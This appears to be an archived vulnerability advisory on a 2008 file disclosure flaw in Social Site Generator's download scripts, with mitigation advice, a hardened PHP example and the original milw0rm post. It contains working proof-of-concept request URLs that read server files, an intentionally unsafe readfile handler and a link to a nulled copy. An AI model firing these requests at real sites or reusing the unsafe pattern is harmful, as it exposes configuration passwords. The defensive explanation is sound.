Vendor: Social Site Generator
Author: Stack & Jadi
CVSS: 7.5 (HIGH)
Type: Remote File Disclosure
CWE: N/A
Product Name: Social Site Generator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

Social Site Generator Remote File Disclosure

A file disclosure vulnerability in Social Site Generator lets a remote, unauthenticated attacker read files from the web server by supplying a path in the file parameter of filedload.php or webadmin/download.php (webadmin/download_file.php is listed as affected as well). The scripts read the requested file from disk and send it to the client as a download instead of executing it, so PHP source comes back verbatim: the advisory's proof of concept retrieves each script's own source, and the same parameter can be pointed at any file readable by the web server account, including configuration files containing passwords and other sensitive information.

Mitigation:

Validate the file parameter in each download script: accept only a plain file name (no directory separators, no "..", no NUL bytes), resolve it under a dedicated download directory and confirm the canonical path stays inside that directory, and serve only an allowlist of non-script extensions. As defence in depth, configure the web server to deny direct access to configuration files and to any script files under the download directory. No vendor patch is listed for this issue.
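The following is an added example written for this page, not the Social Site Generator source: a hypothetical download handler showing the unsafe pattern the advisory describes next to a hardened version of the same handler. The directory name, extension allowlist and function names are assumptions.

```php
<?php
// Hypothetical download handler illustrating the bug class in this advisory.
// Not the Social Site Generator code; directory and allowlist are assumptions.

// Vulnerable pattern: the request parameter is used directly as a path.
// ?file=filedload.php returns this script's own source (readfile does not
// execute PHP), and ?file=../config.php returns configuration files.
function download_unsafe(string $userFile): void
{
    readfile($userFile);
}

// Hardened version: serve only regular files that live inside a fixed download
// directory, referenced by bare file name, and never files with script extensions.
function download_safe(string $userFile, string $baseDir): bool
{
    // Only a plain file name is acceptable: this rejects "../", "/" and NUL bytes.
    if ($userFile === '' || basename($userFile) !== $userFile || strpos($userFile, "\0") !== false) {
        return false;
    }

    // Canonicalise both the directory and the candidate (resolves symlinks).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $userFile);
    if ($base === false || $path === false) {
        return false;
    }

    // The canonical path must still be under the download directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    // Extension allowlist: never hand out .php, .inc, .conf or similar.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (!in_array($ext, ['zip', 'pdf', 'jpg', 'png', 'txt'], true)) {
        return false;
    }

    if (!is_file($path)) {
        return false;
    }

    // Emit a download; sanitise the name we echo back into the header.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', $userFile);
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    return true;
}

// Usage: downloads live in ./downloads (assumed); anything rejected is a 404.
$baseDir = __DIR__ . '/downloads';
if (!download_safe($_GET['file'] ?? '', $baseDir)) {
    http_response_code(404);
    echo 'File not found';
}
```

The basename check alone already stops the advisory's requests, but the realpath comparison is what guards against symlinks inside the download directory, and the extension allowlist is what prevents a legitimately placed .php file from being read as text. The same checks apply to download.php and download_file.php; a cleaner design maps opaque identifiers to file names in a database so that no path fragment ever comes from the client.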

Exploit-DB raw data:

############################################################################################
# 
# Application Name         : Social Site Generator
#
# Download                 : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type          : Remote File disclosure
#
# Dork                     : search it :p
#
# Vulnerable file          : filedload.php
#
# author                   : Stack & Jadi
#
# Team                     : v4 Team http://v4-team.com
#
# THNX                     : ALLAH
#Greetz : Houssamix & Djekmani & Jadi & iuoisn &Room-Hackers All muslims HaCkeRs  :)
#                               www.v4-team.com     &    www.Real-Hack.com   &    www.Tryag.com
#
#
############################################################################################
< ------------------- Stack ------------------- >|
\        /                                                          |
  \    /          Wanted                           |
    \/__________________________________|

< -- Bug -- >
Exploit :
http://target/path/filedload.php?file=filedload.php
http://target/path/webadmin/download.php?file=download.php
http://target/path/webadmin/download_file.php

# milw0rm.com [2008-06-01]